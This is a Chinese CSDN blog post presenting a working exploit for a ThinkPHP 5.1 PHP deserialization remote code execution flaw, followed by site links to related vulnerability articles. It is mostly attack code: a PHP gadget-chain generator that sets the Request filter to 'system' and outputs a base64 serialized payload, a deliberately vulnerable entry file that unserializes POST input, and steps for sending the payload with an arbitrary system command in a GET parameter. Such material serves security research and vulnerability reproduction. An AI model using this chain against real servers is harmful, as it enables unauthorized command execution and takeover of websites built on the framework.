Thinkphp5.1 反序列化漏洞

最新推荐文章于 2024-05-01 04:30:00 发布
最新推荐文章于 2024-05-01 04:30:00 发布
阅读量727 收藏
点赞数
分类专栏: 代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nigo134/article/details/119429998
版权

exp:

public/ning.php

<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["ethan"=>["calc.exe","calc"]];
        $this->data = ["ethan"=>new Request()];
    }
}
class Request
{
    protected $hook = [];
    protected $filter = "system";
    protected $config = [
        // 表单请求类型伪装变量
        'var_method'       => '_method',
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',
        // 表单pjax伪装变量
        'var_pjax'         => '_pjax',
        // PATHINFO变量名 用于兼容模式
        'var_pathinfo'     => 's',
        // 兼容PATH_INFO获取
        'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
        // 默认全局过滤方法 用逗号分隔多个
        'default_filter'   => '',
        // 域名根,如thinkphp.cn
        'url_domain_root'  => '',
        // HTTPS代理标识
        'https_agent_name' => '',
        // IP代理获取标识
        'http_agent_ip'    => 'HTTP_X_REAL_IP',
        // URL伪静态后缀
        'url_html_suffix'  => 'html',
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>''];
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}
namespace think\process\pipes;

use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;

use think\Model;

class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

利用点:

public/index.php

<?php
// +----------------------------------------------------------------------
// | ThinkPHP [ WE CAN DO IT JUST THINK ]
// +----------------------------------------------------------------------
// | Copyright (c) 2006-2018 http://thinkphp.cn All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: liu21st <liu21st@gmail.com>
// +----------------------------------------------------------------------

// [ 应用入口文件 ]
namespace think;

// 加载基础文件
require __DIR__ . '/../thinkphp/base.php';

// 支持事先使用静态方法设置Request对象和Config对象

// 执行应用并响应
Container::get('app')->run()->send();
$str = base64_decode($_POST['key']);
unserialize($str);

利用:

 将base64加密的序列化字符串通过post传入,get传入要执行的命令,get传的键任意,值及为要执行的系统命令。

详细分析过程:

https://blog.csdn.net/rfrder/article/details/113843768

https://paper.seebug.org/1040/#_2 

nigo134
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ThinkPHP5 SQL注入漏洞 && 敏感信息泄露
jammny
01-21 4030
前言 Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身 Voulhub靶机平台环境搭建和使用: https://blog.csdn.net/qq_41832837/article/details/103948358 目录: 漏洞原理 漏洞详情 漏洞复现 ...
ThinkPHP5.1反序列化漏洞
Sentiment的博客
05-20 5257
前言 在了解完tp的一些规则后,开始本篇反序列化漏洞的复现学习 安装 源码下载链接 没有composer可以去下载,傻瓜式安装即可Composer (getcomposer.org) 使用composer安装 composer create-project topthink/think=5.1.* tp 启动服务 cd tp php think run 然后就可以在浏览器中访问 http://localhost:8000 搭建成功 反序列化链分析 反序列化利用点肯定要是从__destruct()开始
基于框架漏洞的代码审计实战(1)
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
05-01 774
某开源项目最新版的CMS,该漏洞已提交至CNVD。
Thinkphp5.1 ~ 5.2代码执行漏洞
公众号shadow sock7
01-16 9802
需要在library/think/Error.php中设置: error_reporting(0); http://proxy.boomeye.com:19300/wordpress/index.php/2019/01/15/thinkphp5-1-5-2-rec/ 设置前(默认情况下): 设置后: payload: POST /thinkphp-5.1.29/html/public/ind...
ThinkPHP 5.1框架结合RCE漏洞的深入分析
systemino的博客
04-21 4374
前言 在前几个月,Thinkphp连续爆发了多个严重漏洞。由于框架应用的广泛性,漏洞影响非常大。为了之后更好地防御和应对此框架漏洞,天融信阿尔法实验室对Thinkphp框架进行了详细地分析,并在此分享给大家共同学习。 本篇文章将从框架的流程讲起,让大家对Thinkphp有个大概的认识,接着讲述一些关于漏洞的相关知识,帮助大家在分析漏洞时能更好地理解漏洞原理,最后结合一个比较好的RCE漏洞(超链...
ThinkPHP 系列漏洞
SHELLCODE_8BIT的博客
11-18 2935
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1、thinkphp5 SQL注入1漏洞影响版本: 5.0.13
ThinkPHP5.1完全开发手册.pdf
01-16
ThinkPHP5.1完全开发手册,非常适用于APP开发。
ThinkPHP5.1之JWT扩展包
03-07
ThinkPHP5.1框架专用JWT扩展包,解压至extend目录即可使用,支持自动验证账号密码并生成token,自动验证请求参数中的token合法性,支持自定义token负载,更多用法详见README.md文件。
ThinkPHP5.1 框架下 PhpSpreadsheet 操作 Excel 表的导入导出.rar
12-16
本资源对应文章:ThinkPHP5.1 框架下 PhpSpreadsheet 操作 Excel 表的导入导出 希望可以帮助到有需要的道友们,入门后可做优化哦
ThinkPHP3.2.3反序列化链子分析.doc
07-08
ThinkPHP3.2.3反序列化链子分析.doc
Thinkphp-v5.1.x反序列化漏洞复现分析
weixin_45678034的博客
01-14 2986
环境搭建 使用 composer下载项目 composer create-project topthink/think=5.1.37 v5.1.37 配置控制器 <?php namespace app\index\controller; class unserialize{ public function kb(){ if(isset($_POST['unserialize'])){ $a = $_POST['unserialize'];
thinkphp远程代码执行漏洞
热门推荐
锋刃科技的博客
12-11 1万+
0x00前言 近日thinkphp团队发布了版本更新https://blog.thinkphp.cn/869075,其中修复了一处getshell漏洞。 影响范围:5.x &lt; 5.1.31, &lt;= 5.0.23 危害:远程代码执行 0x01漏洞原理 首先我们来看url http://localhost/public/index.php?s=index/\think\Cont...
Thinkphp5.1 反序列化漏洞复现
feng的博客
02-18 4238
前言 开始tp5.1反序列化链的复现,这个链我上学期10月份的时候尝试复现过,但是当时的自己代码审计能力,反序列化的能力也都实在太菜,不足以理解这个链。这个链相比yii2,laravel5.7,5.8的那些链,长度和难度都提高了很多,思维的跳跃也很,自己也要想办法把它啃下来。 源码下载: thinkphp5源码 或者去github上下载也可以。 然后写个控制器: <?php namespace app\index\controller; class Unserialize { pub
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程命令执行漏洞
qq_50854662的博客
10-23 1341
ThinkPHP 5.0.x、5.1.x、5.2.x 全版本远程代码执行漏洞 漏洞概述: ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架。借鉴Struts框架的Action对象,同时也使用面向对象的开发结构和MVC模式。1月11日,ThinkPHP官方发布新版本5.0.24,在1月14日和15日发布两个更新,这几次更新都修复了远程代码执行漏洞,对于5.0.x、5.1.x、5.2.x 这几个版本,都无需登入可以进行远程代码执行。 漏洞版本: 5.0.x5.1.x5.2.x 漏洞搭建
thinkphp漏洞_漏洞分析之thinkPHP反序列化:这就是黑客的世界吗
weixin_39715997的博客
11-21 347
前言作为一个Web菜鸡,我之前和师傅们参加了红帽杯,奈何只有0输出,当时只知道是thinkphp5.2的反序列化漏洞,但是感觉时间不够了,也就没有继续做下去。只有赛后来查漏补缺了,也借着tp5.2这个反序列化pop链来学习下大佬们的构造思路,不得不说这个pop链真的是很强了,在分析的过程中,妈妈一直问我为什么跪着玩电脑~红帽杯2019 Ticket_System思路在直接输入xml数据处存在xxe...
调用链 php,ThinkPHP5.1.x反序列化调用链复现分析
weixin_39627201的博客
03-10 281
1.前言最近研究了phpok5.3反序列化可直接getshell的漏洞,又见到土司里对ThinkPHP多个版本调用链的总结,于是便想着来复现分析一下。本文只是对反序列化调用链的分析,POC并不能直接被利用,需要基于ThinkPHP开发的代码有可用的反序列化入口。2.反序列化调用链分析通常PHP反序列化漏洞的入口为类的魔术方法,PHP是这样定义魔术方法的:PHP将所有以__(两个下划...
thinkphp 5-rcerce漏洞getshell)
weixin_51692662的博客
11-03 2589
thinkphp 5-rcerce漏洞getshell)
Thinkphp 反序列化利用链深入分析
晓得哥的博客
09-29 681
作者:Ethan@知道创宇404实验室 时间:2019年9月21日 前言 今年7月份,ThinkPHP 5.1.x爆出来了一个反序列化漏洞。之前没有分析过关于ThinkPHP反序列化漏洞。今天就探讨一下ThinkPHP反序列化问题! 环境搭建 Thinkphp 5.1.35 php 7.0.12 漏洞挖掘思路 在刚接触反序列化漏洞的时候,更多遇到的是在魔术方法中,因此自动调用魔术方法而触发漏洞...
ThinkPHP6反序列化漏洞核心原理
04-11
ThinkPHP6反序列化漏洞的核心原理是由于ThinkPHP6框架在处理反序列化时存在安全漏洞,攻击者可以构造恶意的序列化数据,通过该漏洞执行任意代码。具体原理如下: 1. ThinkPHP6框架使用了PHP的unserialize()函数来反...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值